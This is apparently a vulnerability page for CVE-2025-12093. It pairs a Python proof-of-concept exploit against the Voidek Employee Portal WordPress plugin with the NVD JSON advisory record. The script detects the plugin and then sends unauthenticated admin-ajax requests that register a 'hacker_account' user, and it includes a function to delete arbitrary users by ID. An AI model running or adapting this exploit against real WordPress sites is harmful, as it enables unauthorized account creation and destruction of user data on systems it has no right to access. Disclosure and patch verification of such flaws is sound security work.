CVE-2025-12093

import requests import sys # CVE-2025-12093 PoC - Voidek Employee Portal Unauthenticated Access # Target: WordPress site with Voidek Employee Portal plugin <= 1.0.7 TARGET_URL = "http://target-wordpress-site.com" def exploit_unauthorized_user_registration(): """ PoC: Exploit missing capability check to register new user account """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Action to register new account without authentication data = { 'action': 'voidek_register_user', 'username': 'hacker_account', 'email': '[email protected]', 'password': 'P@ssw0rd123', 'first_name': 'Hacker', 'last_name': 'Test' } response = requests.post(endpoint, data=data) print(f"[*] Registration Response: {response.status_code}") print(f"[*] Response Body: {response.text}") return response def exploit_unauthorized_user_deletion(user_id): """ PoC: Exploit missing capability check to delete existing user """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Action to delete user without authentication data = { 'action': 'voidek_delete_user', 'user_id': user_id } response = requests.post(endpoint, data=data) print(f"[*] Deletion Response: {response.status_code}") print(f"[*] Response Body: {response.text}") return response def check_plugin_version(): """ Check if vulnerable version of plugin is installed """ readme_url = f"{TARGET_URL}/wp-content/plugins/voidek-employee-portal/readme.txt" try: response = requests.get(readme_url, timeout=10) if 'voidek-employee-portal' in response.text.lower(): print(f"[*] Voidek Employee Portal plugin detected") return True except: pass return False if __name__ == '__main__': print("[*] CVE-2025-12093 PoC - Voidek Employee Portal <= 1.0.7") print("[*] Vulnerability: Missing capability check on AJAX actions") if check_plugin_version(): print("[+] Plugin detected, attempting exploitation...") exploit_unauthorized_user_registration() else: print("[-] Plugin not detected or not accessible")

{"cve": {"id": "CVE-2025-12093", "sourceIdentifier": "[email protected]", "published": "2025-12-05T07:16:08.347", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Voidek Employee Portal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in all versions up to, and including, 1.0.7. This makes it possible for unauthenticated attackers to perform several actions like registering an account, deleting users, and modifying details within the employee portal."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419774%40voidek-employee-portal&new=3419774%40voidek-employee-portal&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/voidek-employee-portal/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d33b83d5-cfc0-48b6-a54e-1ae8ac52aae1?source=cve", "source": "[email protected]"}]}}